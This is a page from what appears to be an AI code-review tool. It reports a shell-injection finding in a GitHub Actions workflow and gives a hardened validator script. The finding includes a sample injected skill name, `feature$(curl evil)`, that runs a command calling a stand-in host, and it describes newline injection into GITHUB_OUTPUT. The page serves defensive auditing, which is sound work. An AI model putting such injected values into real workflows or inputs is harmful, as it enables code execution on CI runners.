AntFleet

Disagreement · 18907f89-anthropic-7

Skill-name template interpolation in `run:` blocks enables shell injection from workflow_dispatch inputs

solo Opus
repo 6f7fc663·PR #31·reviewed 1 week ago

Opus finding

Skill-name template interpolation in `run:` blocks enables shell injection from workflow_dispatch inputs

high · security · high
  • .github/workflows/aeon.yml:81-82
  • .github/workflows/aeon.yml:120-122
  • .github/workflows/aeon.yml:174-175
  • .github/workflows/aeon.yml:254-256
  • .github/workflows/aeon.yml:260-262
Many `run:` blocks embed `${{ inputs.skill }}`, `${{ inputs.model }}`, `${{ inputs.var }}`, and `${{ steps.skill.outputs.name }}` directly into bash script bodies via GitHub Actions template substitution. Although workflow_dispatch requires write access to trigger by default, GitHub's published guidance treats template injection in run blocks as a class of risk because (a) the values are substituted before bash quoting, (b) the workflow also accepts `workflow_call` from other workflows, and (c) a malicious skill name like `feature$(curl evil)` would execute. The `Determine skill` step uses `echo "name=${{ inputs.skill }}" >> "$GITHUB_OUTPUT"`, which is the canonical injection pattern — a value with newlines can inject arbitrary GITHUB_OUTPUT keys, and a value with `$(...)` is executed by bash. This is the well-known 'untrusted input in run script' anti-pattern.

Recommendation

Move all `${{ inputs.* }}` and `${{ steps.*.outputs.* }}` values into `env:` mappings on each step and reference them as `$SKILL` / `$INPUT_MODEL` etc. Validate skill name against `^[a-zA-Z0-9_-]+$` in the Determine skill step.
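
Added example (not part of the finding and not the repository's workflow): the hardened form of the `Determine skill` step body. It assumes the workflow passes the input through an `env:` mapping such as `env: { SKILL: '${{ inputs.skill }}' }`, so the script reads `$SKILL` and bash never re-parses the value as code; `GITHUB_OUTPUT` is the real Actions output file, while `validate_skill_name` and `emit_skill_output` are names chosen here. The validator uses a `case` pattern rather than `grep`, because `grep -q` matches per line and would accept a value whose first line is clean, which is exactly the newline-injection case the finding describes.

```shell
#!/bin/sh
# Hardened "Determine skill" step body (added example, assumed names).
# Reads the skill name from an env-mapped variable instead of a ${{ }} template.

# Return 0 if the name matches ^[a-zA-Z0-9_-]+$, else 1.
# A case pattern checks the whole value at once, so an embedded newline or
# any shell metacharacter ($, (, ), `, ;) is rejected, not just a bad line.
validate_skill_name() {
  case "$1" in
    "")                   return 1 ;;   # empty is not a valid skill
    *[!a-zA-Z0-9_-]*)     return 1 ;;   # any character outside the allowlist
    *)                    return 0 ;;
  esac
}

# Append name=<value> to the step output file ($2, defaulting to $GITHUB_OUTPUT)
# only after validation. The value reaches this function via an environment
# variable, so `$(...)` inside it is plain text here and is never executed.
emit_skill_output() {
  name="$1"
  out="${2:-${GITHUB_OUTPUT:?GITHUB_OUTPUT is not set}}"
  if ! validate_skill_name "$name"; then
    echo "::error::skill name rejected: must match ^[a-zA-Z0-9_-]+\$" >&2
    return 1
  fi
  printf 'name=%s\n' "$name" >> "$out"
}

# Usage inside the step (SKILL comes from the env: mapping, assumed name):
#   emit_skill_output "$SKILL"
```

In the workflow, the step would carry `env: SKILL: ${{ inputs.skill }}` and a `run:` of `emit_skill_output "$SKILL"` (or the function body inlined); the same pattern applies to `inputs.model`, `inputs.var` and `steps.skill.outputs.name` at the other flagged lines.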

Other reviewer

The other reviewer flagged nothing in this file/line range.

Why this didn't post

This finding didn't meet AntFleet's unanimous agreement threshold. Both frontier models review every PR independently; only findings they both flag with the same severity and category are posted to the PR. This one fell through.
